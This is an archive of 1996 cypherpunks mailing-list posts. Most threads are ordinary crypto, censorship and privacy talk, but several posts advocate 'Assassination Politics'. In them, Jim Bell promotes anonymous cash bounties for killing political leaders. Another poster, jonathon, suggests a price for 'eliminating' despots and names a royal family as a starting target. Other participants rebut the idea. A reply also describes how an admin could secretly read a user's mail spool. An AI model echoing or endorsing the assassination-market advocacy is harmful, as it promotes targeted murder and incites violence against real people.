Jim Bell is opposed to "truly random attacks on ordinary citizens" >Its this type ofappoligia for terrorism that disgusts me utterly. >He is calling for murder but wants to dress it up in whatever psychotic >justifications he can. >He is also completely wrong. When the IRA attemoted to assasinate my cousin >I was in no way intimidated and neither was he. He continued as a senior >poitician for over a decade despite continued danger. I can think of no >less effective method of bringing about change in attitudes. And he, along with others, failed to solve the problems as well. Is this progress? >I am in no way intimidated by Bell either. He is a kook and I don;t think it >he is worth further consideration. > Phill For the record, if an AP-type system were to operate it would: 1. Make it impossible for the British to continue to station troops in Northern Ireland, an eventuality that I suppose Phill resists. However, it would also: 2. Make it impossible and unnecessary for the British to have any troops anywhere, because it would eliminate its government and military. It would no longer be a country, merely an island with people living there. 3. Make it unnecessary in Northern Ireland to protect the Catholics from the Protestants, or the Protestants from the Catholics, because the trouble-makers from both (all?) sides would be quickly erased from the scene. Nobody would rule anybody. Nobody COULD rule anybody. All factions would either be peaceful or dead, their choice. No political advantage could be gained by violence, because all politics would have ceased. 4. Make it unnecessary and pointless for Northern Ireland to re-unify with Ireland, because likewise the government and military of Ireland would dissolve, as well as all political structure in that land as well. In short, the only reasons that the current problems are maintained in Northern Ireland and Britain would be eliminated by the advent of AP. So who is the "kook," really? Jim Bell jimbell at pacifier.com From deviant at pooh-corner.com Tue Sep 24 01:22:02 1996 From: deviant at pooh-corner.com (The Deviant) Date: Tue, 24 Sep 1996 16:22:02 +0800 Subject: Taking crypto out of the U.S. In-Reply-To: Message-ID: On Mon, 23 Sep 1996, Hamish wrote: > Date: Mon, 23 Sep 1996 18:18:15 -0400 (EDT) > From: Hamish > To: cypherpunks at toad.com > Subject: Taking crypto out of the U.S. > > Soon I am going to be going overseas to Japan, and I want to take > my notebook with me so I can keep up with everything, however, I have > encrypted my hard drive and usually encrypt my mail. Is this in violation > of the ITAR to keep everything the same when I go over? > > > Not if nobody else is allowed to use i (but some theif could cause you to violate ITAR ;)... the real question is: do they have 120 VAC plugs in Japan? ... --Deviant Slowly and surely the unix crept up on the Nintendo user ... From wb8foz at nrk.com Tue Sep 24 01:33:40 1996 From: wb8foz at nrk.com (David Lesher) Date: Tue, 24 Sep 1996 16:33:40 +0800 Subject: We removed radikal 154 from xs4all In-Reply-To: <199609232122.OAA15542@atropos.c2.org> Message-ID: <199609240330.XAA00710@nrk.com> > > > Unfortunately, this means that Germany wins. > > How does this mean that Germany wins? "radikal 154" is still > available all over the world, at almost 50 mirror sites, I beleive > (including http://www.c2.net/radikal/), which are *not* blocked by > Germany. Indeed, that's the Xenu "Statue of Liberty" technique, used against the Cult of $pamology. Helena runs around stepping on ants [some of whom turn out to be fire-ants]; only to find 4x as many as before she started... -- A host is a host from coast to coast.................wb8foz at nrk.com & no one will talk to a host that's close........[v].(301) 56-LINUX Unless the host (that isn't close).........................pob 1433 is busy, hung or dead....................................20915-1433 From wombat at mcfeely.bsfs.org Tue Sep 24 01:35:44 1996 From: wombat at mcfeely.bsfs.org (Rabid Wombat) Date: Tue, 24 Sep 1996 16:35:44 +0800 Subject: [NOISE] Re: possible solution to cyber S/N In-Reply-To: <199609232354.SAA00523@manifold.algebra.com> Message-ID: > Globally: Vladimir's recommendations lead to a vicious circle of > "tyranny" of popular sites because hte more people view a site, the more > will follow and the site's "attractiveness" rating will go even higher. > Nobody goes there anymore. It's too crowded. - Yoggi Bera ;) From unicorn at schloss.li Tue Sep 24 01:36:19 1996 From: unicorn at schloss.li (Black Unicorn) Date: Tue, 24 Sep 1996 16:36:19 +0800 Subject: Taking crypto out of the U.S. In-Reply-To: Message-ID: On Mon, 23 Sep 1996, Hamish wrote: > Soon I am going to be going overseas to Japan, and I want to take > my notebook with me so I can keep up with everything, however, I have > encrypted my hard drive and usually encrypt my mail. Is this in violation > of the ITAR to keep everything the same when I go over? > I'm not rendering a legal opinion here, but I will try to make your position clear. 1> It depends 2> It depends 3> It depends. First, what encryption type is it? Some encryption is freely exportable. Second, is it just encrypted data you're exporting, or also the means to encrypt/decrypt it. (It's not clear from your post) Third, do you plan on telling anyone what's on your drive? -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From tank at xs4all.nl Tue Sep 24 01:37:46 1996 From: tank at xs4all.nl (tank) Date: Tue, 24 Sep 1996 16:37:46 +0800 Subject: We removed radikal 154 from xs4all :( Message-ID: <199609231831.UAA21914@xs1.xs4all.nl> Hi all, We have temporary removed radikal 154 from xs4all. We did this because the german ICTF and BAW continued to stop IP-traffic to and from xs4all. They not only blocked the web-server (with more than 3100 homepages from users and compagnies) but 2 Class C-networks. The pressure was to high for both xs4all and it costumers (more than 12500 users). They were not able to mail, ftp, www in large parts of germany. The 47 mirrors of the radikal site made it possible for us to remove issue 154 from xs4all. All 47 mirrors are still accessable by german netizens. There is no filtering of traffic to these servers. The ICTF and BAW now have to deceide if they will block all ip-traffic to and from all 47 servers, or they have to stop their censoring actions. In both cases we will put the issue radikal 154 back online. We are still calling for more mirrors. The more mirrors, the more pressure on the ICTF and BAW to stop their censorship. You can get a copy of the who archive from ftp://utopia.hacktic.nl/pub/replay/pub/incoming or from one of the mirror-sites. regards, henk (SPG) From sandfort at crl.com Tue Sep 24 02:06:16 1996 From: sandfort at crl.com (Sandy Sandfort) Date: Tue, 24 Sep 1996 17:06:16 +0800 Subject: AP [was: Re: Kiddie porn on the Internet] [NOISE] In-Reply-To: <6XJquD10w165w@bwalk.dm.com> Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, On Mon, 23 Sep 1996, Dr.Dimitri Vulis KOTM wrote: > There is no such thing as an "ordinary citizen". When the U.S. commits > war crimes in Korea, Viet Nam, Grenada, Panama, Somalia, Iraq, and elsewhere, > every American taxpayer is an accomplice and a fair game. Illogical collectivist claptrap. When a taxpayer is targeted by terrorists, he has been victimized twice--first by the government that stole his money, second by the terrorist that punished him for the (alleged) acts others commited with that money. If a mugger buys a gun with the money he took from me, am I then responsible for the murder he commits with it? Clearly not. This line of "reasoning" is nothing more than a sad variant of the old, "blame the victim" game. For shame. Let's bring this back to crypto for a moment. Dimitri's "logic" must necessarily lead one to the conclusion that Cypherpunks (at least those in the US) are responsible for whatever draconian restrictions "our" government puts on free speech, crypto or whatever. John Gilmore, Philip Zimmermann, Whit Diffie and others will be chagrined to learn this, I'm sure. Dimitri needs to learn what it means to be an adult. Everyone is totally responsible for what they do, but ONLY for what THEY do. No one is responsible for the unassisted, willful acts of others. S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From jimbell at pacifier.com Tue Sep 24 02:21:13 1996 From: jimbell at pacifier.com (jim bell) Date: Tue, 24 Sep 1996 17:21:13 +0800 Subject: crypto anarchy vs AP Message-ID: <199609240700.AAA16178@mail.pacifier.com> At 11:26 AM 9/23/96 -0700, Clint Barnett wrote: >>to create the appearance of as free a life style as they can for >>individuals > >ever read "1984"? the appearance of a free lifestyle is most definitely >not a free lifestyle. I am hardly a friend of the state, and far from >being an advocate of the church, but multinational corporations running >the world for their own fun and profit makes my sphincter clench. I think you're under a mis-impression here. At least in the libertarian circles where I do most of my political discussion, it is generally suspected that corporations grow large and powerful primarily BECAUSE OF assistance by and due to the policies of government. (heavy regulation favors large companies by keeping down small competitors, etc) Of course, that cause/effect relationship is intentionally hidden, and most of the public sees the show put on which appears to have the opposite effect: Anti-trust lawsuits, etc. Over time, the public is gulled into the false belief that if you get rid of the government, you get rid of the "only think that stands between us and the multi-national corporations." They believe this because the only government actions they see and recognize are anti-corporation. If they were aware of the truth, they'd realize that these large corporations are actually afraid of a free market, and that the companies consider big government to be their friends.. Just look at an excellent example: Intel versus IBM. Intel used to be this tiny upstart chip company from the Bay area and IBM was smokestack America. Now, Intel is the biggest (by dollar volume, anyway) chip company in the world and IBM is, well, considerably cut back from its heyday. At least in hindsight, IBM would have been "smart" to squash Intel, or buy it up, or have the government over-regulate it. Jim Bell jimbell at pacifier.com From wombat at mcfeely.bsfs.org Tue Sep 24 02:24:03 1996 From: wombat at mcfeely.bsfs.org (Rabid Wombat) Date: Tue, 24 Sep 1996 17:24:03 +0800 Subject: Snooping ISP admin?? In-Reply-To: <199609232112.QAA07155@xanadu.io.com> Message-ID: On Mon, 23 Sep 1996, Douglas R. Floyd wrote: > > > > Greetings All, > > > > Question for the group: I have encountered a situation that causes me > > to believe an ISP is snoopingthrough encrytped mail. It seems that > > PGP'd mail has aroused the curiosity of an ISP (not hooked.net).. I have > > encountered "POP3 account in use by another user" several times in the > > past few days and I am the only user... wondering if that "in use" > > messsage is the result of a clumsy sysadmin being caught with his hand > > in the cookie jar. Any thoughts from the group??? If those more > > knowledgeable than I deem these NOISE... my sincere apologies. > > An admin could just copy the mail spool file to a safer place, then read > through at their leisure. > > Unless its someone totally clueless (which some ISP's are), I doubt that > they are pulling off the pop3d. It could be that your mail spool file is > locked by a mail transport agent, and that is why that error message is > occuring. > > Any thoughts? > This is probably somewhat system dependant, but I'm guessing that any lock on the file "could" generate the message that the account is "in use." Could be a lock which was not cleared from a previous session, a backup system that wants exclusive reads on the files, etc., not necessarily another POP3 session. As for the sysadmin side, yes, there are other, easier methods of getting at the mail file. OTOH, could be someone inside an ISP (or not), who does not have access to the file structure, but did somehow obtain passwords through other means. Any ISP of any size will have different levels of access for different employees, and the graveyard helpdesk shift can get fairly dull ... It is more than likely a system-related problem with a file lock, though. I'd suggest changing your password, and making sure that you don't use a dictionary word or obvious permutation thereof. If you continue to have problems, check with the ISP about your "technical difficulties", and see what they come up with. Just my $.02 - r.w. From jimbell at pacifier.com Tue Sep 24 02:34:15 1996 From: jimbell at pacifier.com (jim bell) Date: Tue, 24 Sep 1996 17:34:15 +0800 Subject: AP [NOISE] Message-ID: <199609240323.UAA02037@mail.pacifier.com> At 10:10 PM 9/23/96 -0400, hallam at vesuvius.ai.mit.edu wrote: > >Jim, > > I do support the presence of troops in Northern Ireland and >do not consider that to contradict my belief that there should be a >united, autonamous Ireland. I do not believe that the "loyalists" are >in fact loyal to the British way of life, any more than the KKK are >representative of the US south. > > Troops are in Northern Ireland for a very simple and depressing >reason. People like Jim want to impose their will on others by force. Quite the contrary. I want to reduce, as much as possible, the ability of people to impose their will on others by force. Read my essay. Eventually you might figure it out. The difference is, I recognize that if you set up a government to try to minimize non-government violence and coercion, you'll get just that: A minimization of NON-GOVERNMENT violence and coercion, at the expense of vastly increasing the GOVERNMENT kind. And I don't consider that progress at all. >Despite prolonged attempts by each faction to assasinate the leaders of >the other they have been unsuccessful. I suppose it didn't occur to you that this is EXACTLY why this dispute has gone on so long? What if instead of being "unsuccessful," these attempts suddenly became 100% successful. Easy, even. Just push a button and the top guy on the other side dies. And you could do this as often as, say, once an hour, with all of his replacements. And the other side can do the same to your leadership. How long do you think it would be before people decide that maybe, they DON'T want to "step up to the plate" and get killed for the sake of their cause? >If terrorists trained by Lybia >and Syria are unable to assasinate at will then we can be sure thaqt Jim's >band of kooks is not going to get any further. Which means that you clearly don't understand the motivating factor of a large, totally anonymous e-cash payment. And why should a handful of "terrorists" be successful? The "AP gang" will consist of 5 BILLION people who want to collect the reward, including anyone close to the target. It'll put an entirely new, ominous meaning into the phrase, "Friends and Family"! B^) >If the integration of both Irealand and the UK into the European >Union has not ended the situation the complete lack of government >will not either. Hell, the whole reason for this dispute is heirarchical social systems, in this case governments and religions! And adding the European Union merely increases the problem by adding to the heirarchy. My solution eliminates the heirarchy, totally. Why, then, should EU's failure imply a failure by AP? It's the diametrically opposite tactic. > It is suprising that someone from the press has not seized upon Jims >ideas as cause for another cyber-scare. I suspect this is because people >like Markof are somewhat more responsible. No, it's probably because they think, nervously, that I might just be right. Even that won't necessarily want to make them want to associate their names with my ideas. If they truly understand them, they'll recognize that it'll happen regardless of the amount of approval it gets from polite society. >This is not going to stop me >from producing an op-ed piece linkiing the net libertarians to assasination >politics unless I hear a few more repudiations of Bell's ideas. A doubt whether most people feel themselves obligated to repudiate a proposal, particularly if they don't know that it won't constitute an improvement over the status quo. On the other hand, if the world engineers a good, permanent solution to the Northern Ireland problem in the next six months, as well as the Middle East problem, the India/Pakistan problem, the Chechnya problem, the North/South Korea problem and a few other heretofore intractable problems, you can start feeling confident that my "extreme" solution will be avoidable. Until then, don't get your hopes up. >If you >don't very clearly reject his murderous ideas you are going to regret it >just as the left regreted having the USSR or the RAF associated with them. > Phill Time will be the best judge of this, I think. Jim Bell jimbell at pacifier.com From hallam at vesuvius.ai.mit.edu Tue Sep 24 02:35:14 1996 From: hallam at vesuvius.ai.mit.edu (hallam at vesuvius.ai.mit.edu) Date: Tue, 24 Sep 1996 17:35:14 +0800 Subject: AP [was: Re: Kiddie porn on the Internet] [NOISE] In-Reply-To: <199609240135.SAA23298@mail.pacifier.com> Message-ID: <9609240210.AA17228@vesuvius.ai.mit.edu> Jim, I do support the presence of troops in Northern Ireland and do not consider that to contradict my belief that there should be a united, autonamous Ireland. I do not believe that the "loyalists" are in fact loyal to the British way of life, any more than the KKK are representative of the US south. Troops are in Northern Ireland for a very simple and depressing reason. People like Jim want to impose their will on others by force. Despite prolonged attempts by each faction to assasinate the leaders of the other they have been unsuccessful. If terrorists trained by Lybia and Syria are unable to assasinate at will then we can be sure thaqt Jim's band of kooks is not going to get any further. If the integration of both Irealand and the UK into the European Union has not ended the situation the complete lack of government will not either. It is suprising that someone from the press has not seized upon Jims ideas as cause for another cyber-scare. I suspect this is because people like Markof are somewhat more responsible. This is not going to stop me from producing an op-ed piece linkiing the net libertarians to assasination politics unless I hear a few more repudiations of Bell's ideas. If you don't very clearly reject his murderous ideas you are going to regret it just as the left regreted having the USSR or the RAF associated with them. Phill From jim at suite.suite.com Tue Sep 24 02:35:18 1996 From: jim at suite.suite.com (Jim Miller) Date: Tue, 24 Sep 1996 17:35:18 +0800 Subject: really undetectable crypto made somewhat practical In-Reply-To: Message-ID: <9609240307.AA02627@suite.com> > I'm on FCPUNX instead of regular Cypherpunks, so please > excuse me if I'm a little behind the thread. > Few on the cypherpunk list replied to my post, so you didn't miss anything important. > Instead of hashing just the word in an effort to get stego > bits, you could hash a key along with the word. In order to > get the intended hash you would need to know the key. Since > you're probably hashing a whole block of 512 bits (or > whatever's specified in the algorithm) appending a key > should not affect the speed of the system. I'm certain > that this would increase the security, possibly enough > that you wouldn't need to use a regular encryption > algorithm (but I wouldn't bet on it). > I like your suggestion, although not for the reason you suggested it (although your use is a good idea, too). The use of keyed hashes solves one of the problems I saw with my scheme. The main problem I saw with my scheme was that it might be possible to detect that an innocuous message was conveying a hidden encrypted message by analyzing the statistical properties of the relevant hash bits. Problem: If the words in a message are chosen so some of their hash bits (say, 4 bits per hash) combine to form an encrypted message, then those combined hash bits would be suspiciously cryptographically random, whereas the combined hash bits of a message that was not created for the purpose of conveying an encrypted message would not necessarily be cryptographically random. It is conceivable that a program could be written that uses this difference to test if a message is conveying a hidden encrypted message. Solution: Rather than using an unkeyed hash, which gives Eve the ability to generate the relevant block of combined hash bits and test them for certain properties, use a keyed hash. Since Eve does not know the key used to hash the words in the message, she will not be able to generate the relevant block of combined hash bits and will not be able to perform meaningful analysis of the properties of those bits. Further analysis: By hashing words and then using only the first 4 hash bits, what you are really doing is sorting all words into 16 groups. Group 0 consists of all words whose first four hash bits are 0000, group 1 consists of all words whose first four hash bits are 0001, ..., group 15 consists of all words whose first four hash bits are 1111. If a message is constructed by selecting words so their first 4 hash bits combine to form an encrypted message, then, if the message is long enough or you send enough messages, you will probably select words "evenly" from each of the 16 word groups. However, I can think of no reason to assume the distribution of group selections would be "even" for normal messages. Maybe, by some weird fluke, normal messages are mostly constructed from words in groups 1, 3, 4, 9, and 14, for example. By using a keyed hash, your not stuck using a fixed set of word groups. A different hash key will sort the words into different groups. Hash keys effectively prevent Eve from knowing which words in your message came from which groups, thus preventing her from determining if words were chosen "evenly" from each group. Jim_Miller at suite.com From stewarts at ix.netcom.com Tue Sep 24 03:09:04 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Tue, 24 Sep 1996 18:09:04 +0800 Subject: Go away CIA Message-ID: <199609240242.TAA28421@dfw-ix7.ix.netcom.com> At 07:32 PM 9/22/96 -0500, Shane Brath wrote: >On Sat, 21 Sep 1996, Wearen Life wrote: >> I wont be suprised if they where ALSO watching who was visting your page. >But how would they go about globaly watching who goes to your URL, unless >they hack into your server and look at the log, or have a network sniffer >at a access point feeding you? 1) Spooks can do anything :-) 2) Network Solutions Inc., who runs the NIC, is run by spooks. While they don't run all the root-level domain name servers, they influence most of the US ones. It wouldn't be surprising if they can track DNS requests to the root servers, which would let them find which ISPs are looking for the addresses of which second-level domains. This isn't very informative when somebody at aol.com wants an address of compuserve.com (which will get cached at aol.com's DNS server anyway), but tells them a lot more when small-isp.com asks for skeeve.net's address, especially when they know which Usual Suspects are at small-isp.com . 3) Added-paranoia mode, for people who believed 2) :-) Suppose you've got a vanity domain name, like skeeve.net, and they really want to track you. So they hack the data in the .net nameserver to respond to requests for skeeve.net with 198.81.129.94, which tells you that www.skeeve.net is 191.127.0.42, which runs an http server that fetches the information from 203.28.52.181 that you're asking for and an SMTP relay hack that forwards the mail while keeping copies for itself. (Even if you're running SSL encrypted, it can probably still play active eavesdropper, knowing who's talking to 203.28.52.181, though it can't read the encrypted packets. If SSL is currently including IP addresses in the encrypted information to reduce spoofing, it can still at least hose the conversation.) Your ISP will cache this, so the next time somebody wants to talk to skeeve.net, it'll take care of that for them. This really doesn't work well for targets on aol.com, compuserve.com, prodigy.com, ix.netcom.com, worldnet.att.net, and uunet.net that are a bit big to filter all the traffic for, of course, but it catches most of the interesting people. 4) If they _do_ participate in the Network Access Points (e.g. fnords.net, on one of the Metropolitan Area Exchange FDDI rings, is really a CIA plant) they could probably sniff packets for people they don't have peering arrangements with. If you don't see the fnords, they won't eat your packets. If you do see the fnords, they will eat your packets, so you won't see them. This doesn't work as well for switch-based NAPs such as Big Hairy Routers or ATM switches, but ATM Virtual Circuits have fnords all over them anyway; that's why there are _5_ bytes in the header. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From markm at voicenet.com Tue Sep 24 03:29:43 1996 From: markm at voicenet.com (Mark M.) Date: Tue, 24 Sep 1996 18:29:43 +0800 Subject: William Torbitt (pseudonym) In-Reply-To: Message-ID: On Sat, 21 Sep 1996, Timothy C. May wrote: > Presumably the same William Torbitt (psuedonym) who wrote the > Samizdat-distributed "Nomenclature of an Assassination Cabal." > > (One of the best treatments of the various swirling connections surrounding > the JFK assassination and related CIA-Mob-Giancana-Hughes-Castro-etc. > connections.) > > That Torbitt was a pseudonym has some connection to the themes of our list. > It is believed by many--and it sounds plausible to me--that the actual > author was a knowledgeable Texas attorney who had gained much familiarity > with the facts of the case and, circa 1966-68, wrote his extended pamphlet > "The Nomenclature of an Assassination Cabal." Fearing likely sanctions, > both professional and personal, he chose not to use his real name, and > pamphlet circulated informally, without a formal publisher. > > (It is not written in a wacko-style, so I don't dismiss it as the ravings > of a loon.) > > I haven't checked to see if its on the Web. No, but for anyone who's interested, it's available from Prevailing Winds Research (http://www.prevailingwinds.org) for about $7. -- PGP encrypted mail prefered. Key fingerprint = d61734f2800486ae6f79bfeb70f95348 http://www.voicenet.com/~markm/ From markm at voicenet.com Tue Sep 24 03:55:01 1996 From: markm at voicenet.com (Mark M.) Date: Tue, 24 Sep 1996 18:55:01 +0800 Subject: Snooping ISP admin?? In-Reply-To: <32468D68.5E2@hooked.net> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Mon, 23 Sep 1996, Michael E. Carboy wrote: > Greetings All, > > Question for the group: I have encountered a situation that causes me > to believe an ISP is snoopingthrough encrytped mail. It seems that > PGP'd mail has aroused the curiosity of an ISP (not hooked.net).. I have > encountered "POP3 account in use by another user" several times in the > past few days and I am the only user... wondering if that "in use" > messsage is the result of a clumsy sysadmin being caught with his hand > in the cookie jar. Any thoughts from the group??? If those more > knowledgeable than I deem these NOISE... my sincere apologies. Any sysadmin using POP3 to snoop through your mail would have to be a complete moron. It's much easier to just "cat /usr/spool/mail/user" which is undetectable. The sysadmin could then use touch to set the "last read" value to the previous value. Anyone with complete access to the POP3 server would be able to snoop through anyone's mail undetected. My guess is that you are getting that error from a stale lockfile. If any sysadmin is snooping through your mail, you wouldn't know it. Mark - -- PGP encrypted mail prefered. Key fingerprint = d61734f2800486ae6f79bfeb70f95348 http://www.voicenet.com/~markm/ -----BEGIN PGP SIGNATURE----- Version: 2.6.3 Charset: noconv iQEVAwUBMka/4CzIPc7jvyFpAQGc8gf/WgKKIzTnh+FO3V8YLEn4ZjFL1SVtMzyT SsOQ+DXiEPt4Cul4PKGaBtmkvJoVgUuVp6HanbQAtsQhCBi/P5xrVU2lvIjx4K/+ c0PfSmbpc8GrAy8QeCpGMRkBYOgPyqG3A+v7nG7NGcxsShiGewMbAfjpKz/mKjsU tqAc5VUHTAIbuvUW8OUss0u8/6DmRFcfxNmtGJXw7bgfnxilwpRsW5cUEyJaO0ni pBbiN41nssXP5pYN75odZBzEpycmwdRfLaEHCIV0yKFSfugYNI5mUWqpMVxe25bL csel/zdg07B3NRvLg3LJ6kf73WUS3U+KDl7Rgt7Yv0qbEZRl+hk4fA== =DIH1 -----END PGP SIGNATURE----- From tcmay at got.net Tue Sep 24 04:01:35 1996 From: tcmay at got.net (Timothy C. May) Date: Tue, 24 Sep 1996 19:01:35 +0800 Subject: Bernstein hearing: The Press Release Message-ID: At 2:23 PM 9/23/96, Declan McCullagh wrote: >On Sun, 22 Sep 1996, Timothy C. May wrote: > >> If California were to, say, ban speech critical of women's or homosexual's >> rights, would not the First Amendment trump this attempt? > >Not necessarily. > >The Supreme Court has upheld Title VII's ban on workplace "harassment." >The Court said it occured when "discriminatory intimidation, ridicule, and >insult" in a workplace create an uncomfortable "working environment." > >Then there's public accomodation law, under which the (I recall) Greek >owner of a privately-operated diner was held liable for using the word >"nigger" where a black woman could overhear. Whoops! I didn't mean to intersect with "workplace" issues--I mean simple, pure, nonworkplace-related speech. To make this clearer and to separate Title VII stuff out: If California were to, say, ban speech which included the word "orange," or to ban speech which mentioned "Allah," wouldn't the First trump this attempt? As to Title VII and all that garbage, I think the First Amendment means what it says, and that there's something desperately wrong when many blacks call each other "niggers," as in "Yo, Nigga!," but nonblacks can be hit with lawsuits for letting this word slip out. By the way, I just read chunks of Ronald Dworkin's new book on the Constitution, and he makes some interesting comments on the feminist view that words hurtful to women ought to be censored...he's against such interpretations, and argues that if speech hurtful to women, or images hurtful to women, etc., are banned, then why not ban speech critical of Creationists, and speech insulting to Flat Earthers? --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From grafolog at netcom.com Tue Sep 24 04:08:35 1996 From: grafolog at netcom.com (jonathon) Date: Tue, 24 Sep 1996 19:08:35 +0800 Subject: AP [was: Re: Kiddie porn on the Internet] [NOISE] In-Reply-To: <9609240210.AA17228@vesuvius.ai.mit.edu> Message-ID: On Mon, 23 Sep 1996 hallam at vesuvius.ai.mit.edu wrote: > Troops are in Northern Ireland for a very simple and depressing > reason. People like Jim want to impose their will on others by force. The person who wishes to keep those troops in Northern Ireland is the head of an extremely dysfunctional family. The current occupant of 10 Downing street simply contributes to the problem --by trying to enforce 400+ years of unsuccessfull rule. << Logically, the British ought to figured out by now that they aren't welcome now, and never were welcome in Ireland, but then, they aren't noted for their logic. >> > and Syria are unable to assasinate at will then we can be sure > that Jim's band of kooks is not going to get any further. #1: Syrian and Libyan assassins have been extremely effective, in terminating with extreme prejudice, their targets. #2: the AP contractors are paid for their work. $10x5^6, is my guess as the starting price for eliminating some of the despots that inflict their warped rule on others. --- The aforementioned dysfunctional family might make a good starting point. > It is suprising that someone from the press has not seized upon Jims > ideas as cause for another cyber-scare. I suspect this is because people The idea was first proposed 200 + years ago. Computer technology simply makes it easier to implement. And the press in that day had a hard time dealing with it, because in denouncing it, they spread the idea that maybe it is a good thing. Ignored, it becomes forgotten. Denounced, it becomes a cause celebre. > like Markof are somewhat more responsible. This is not going to stop me > from producing an op-ed piece linkiing the net libertarians to assasination Do that op-ed piece --- but remember that AP is not a libertarian position. Libertarian's think that government is a good thing. AP thinks that government is a bad thing, and their philosophical differences get wider, from there. xan jonathon grafolog at netcom.com Patience is a virtue, Virtue is a grace. Grace is a little girl, Who did not wash her face. From schmidt at pin.de Tue Sep 24 04:18:14 1996 From: schmidt at pin.de (Stephan Schmidt) Date: Tue, 24 Sep 1996 19:18:14 +0800 Subject: We removed radikal 154 from xs4all :( In-Reply-To: <199609232122.OAA15542@atropos.c2.org> Message-ID: On Mon, 23 Sep 1996 sameer at c2.net wrote: > How does this mean that Germany wins? "radikal 154" is still > available all over the world, at almost 50 mirror sites, I beleive > (including http://www.c2.net/radikal/), which are *not* blocked by > Germany. ^^^^^^^^^ ICTF members blocked the site. (?) (Non-members didn't block it.) They brought one server down, which they didn't like. So 'they' think, they won. That's the only important thing. Hmm. Did they stop blocking the ip ? I have access. -stephan From rod at wired.com Tue Sep 24 04:31:25 1996 From: rod at wired.com (Roderick Simpson) Date: Tue, 24 Sep 1996 19:31:25 +0800 Subject: Barlow/Taylor censorship debate Message-ID: Come join in John Perry Barlow's Brain Tennis debate (www.wired.com/braintennis/) versus CDA supporter and president of the National Law Center for Children and Families, Bruce Taylor, over government censorship and free speech. Taylor has also been a Justice lawyer and prosecutor for the city of Cleveland, where he prosecuted, among others, Larry Flint. Their debate will last from today through next Wednesday, October 2. To post, go to: http://www.hotwired.com/cgi-bin/interact/replies_all?msg.25733 See you there! Roderick Simpson Associate Producer Wired Online From tcmay at got.net Tue Sep 24 04:36:07 1996 From: tcmay at got.net (Timothy C. May) Date: Tue, 24 Sep 1996 19:36:07 +0800 Subject: Hallam-Baker demands more repudiations or he'll write! Message-ID: At 2:10 AM 9/24/96, hallam at vesuvius.ai.mit.edu wrote: >like Markof are somewhat more responsible. This is not going to stop me >from producing an op-ed piece linkiing the net libertarians to assasination >politics unless I hear a few more repudiations of Bell's ideas. If you >don't very clearly reject his murderous ideas you are going to regret it >just as the left regreted having the USSR or the RAF associated with them. I for one don't respond well to extortion threats, so write your damned article. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From stewarts at ix.netcom.com Tue Sep 24 04:43:26 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Tue, 24 Sep 1996 19:43:26 +0800 Subject: Snake-Oil FAQ Message-ID: <199609240711.AAA12386@dfw-ix9.ix.netcom.com> At 12:34 PM 9/23/96 -0400, Mark Rogaski wrote: >I disagree, I think AC is a pretty scary book for the kind of people who >need the Snake-Oil FAQ. I think the primary target audiences are IS >professionals who are considering integrating crypto into their data >communications and end users who want to send encrypted mail. Neither Besides, it's a good excuse to bash that great purveyor of snake-oil, MicroSoft. Are there _any_ Microsoft products that have "password protection" or "encryption" features that aren't totally wimpy? Word and Excel come with stuff that might keep out your kid sister, but probably wouldn't keep out _my_ kid sister... # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From deviant at pooh-corner.com Tue Sep 24 04:58:12 1996 From: deviant at pooh-corner.com (The Deviant) Date: Tue, 24 Sep 1996 19:58:12 +0800 Subject: Paradox db passwords/encryption In-Reply-To: <199609231753.KAA22705@toad.com> Message-ID: On Mon, 23 Sep 1996, David K. Merriman wrote: > Date: Mon, 23 Sep 1996 10:53:14 -0700 (PDT) > From: "David K. Merriman" > To: cypherpunks at toad.com > Subject: Paradox db passwords/encryption > > To: cypherpunks at toad.com > Date: Mon Sep 23 12:52:32 1996 > Sorry to disturb everyone, but I've got a questions that is (gasp!) > immediately related to crypto: > > Does anyone have any info on the encryption used in the Paradox (4.5 for > Win) database? I've got someone that has an encrypted (well, > password-protected :-) Paradox database that needs some maintenance, and > the person that knew the password is now - shall we say - 'no longer with > them'. Right now, doesn't matter if it's something clever, or a brute-force > hack; they just need to get into the tables and such. > > Dave Merriman > > -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- > PGP Email welcome, encouraged, and PREFERRED. Visit my web > site at http://www.shellback.com/p/merriman > for my PGP key and fingerprint > "What is the sound of one hand clapping in a forest > with no one there to hear it?" > I use Pronto Secure (tm) PGP-fluent Email software for Windows 9 times out of 10 norton's Disk Edit will crack word processor/spreadsheet type encryption... --Deviant Slowly and surely the unix crept up on the Nintendo user ... From frissell at panix.com Tue Sep 24 08:03:48 1996 From: frissell at panix.com (Duncan Frissell) Date: Tue, 24 Sep 1996 23:03:48 +0800 Subject: Where to write crypto? Message-ID: <3.0b19.32.19960923075911.00bd74d4@panix.com> At 07:24 AM 9/23/96 -0500, Adam Shostack wrote: >Switzerland is not the most liberal (libertarian) of countries. >Getting a work permit can be very tough. However, there are crypto >companies and research groups. Haeglin and ETH-Zurich 